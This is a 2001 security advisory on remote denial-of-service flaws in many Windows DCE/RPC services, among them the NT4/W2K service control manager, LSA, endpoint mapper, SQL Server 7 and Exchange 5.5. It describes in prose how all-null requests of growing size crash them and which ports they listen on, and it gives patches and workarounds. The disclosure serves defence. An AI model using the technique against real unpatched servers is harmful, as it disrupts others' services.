Multiple Remote DoS vulnerabilities in DCE/RPC deamons Issue Date: July 30, 2001 Contact: Todd Sabin Topic: Many DCE/RPC servers are vulnerable to remote DoS attacks Overview: Many DCE/RPC servers don't do proper parameter validation, and can be crashed by sending an improperly formatted request. Affected Systems: At least the following services are known to be affected. More servers are likely to be vulnerable. For a complete list of what Microsoft has patched, see their security bulletin mentioned below. W2K SCM (services.exe) NT4 SCM (services.exe) NT4 LSA (lsass.exe) NT4 Endpoint mapper (Rpcss.exe) W2K Endpoint mapper (svchost.exe (fixed by ms00-066)) SQL Server 7 (sqlservr.exe) W2K's DHCP Server W2K's IIS Server (inetinfo.exe) Exchange 5.5 SP3 (STORE.exe) Exchange 5.5 SP3 (MAD.exe) NT4 Spooler (spoolss.exe) W2K License Srv (llssrv.exe) NT4 License Srv (llssrv.exe) Impact: An unauthenticated remote attacker that can talk to the endpoint on which the server is listening can crash the server. In some cases, the servers may either restart themselves, or be restarted by the OS. Details: By sending successively larger and larger requests containing nothing but nulls to every operation on every interface supported by a DCE/RPC server, it's often possible to find a particular request that will crash a server. Note that it's not technically necessary to run through every possible request to crash a given server. Each server has a particular request (or requests) which crashes it. Once the proper request has been found by grinding through all the possibilities, only that request is needed to crash the server. The exact endpoints on which a server listens will vary from service to service. Many listen on named pipes, which are accessible via TCP port 139 or (on W2K) 445. Other services, e.g. Exchange, typically listen on both TCP and UDP ports above 1024. Those services which do not listen on named pipes can usually be enumerated via the endpoint mapper, using rpcdump. rpcdump comes with the NT resource kit. A free version is also available on the RAZOR web site in the rpctools package. If COM Internet Services has been installed and enabled, then these attacks may be possible over port 80, as well. This is not a default configuration, however. Workarounds: Firewall off as much as possible. Recommendations: Install the appropriate patches from Microsoft. Do not install COM Internet Services. ___________________________________________________________________ References: Microsoft's security bulletin: http://www.microsoft.com/technet/security/bulletin/MS01-041.asp Microsoft's patches: The patches vary, depending upon the service. See the security bulletin for details. Microsoft's Knowledge Base article: http://support.microsoft.com/support/kb/articles/Q298/0/12.ASP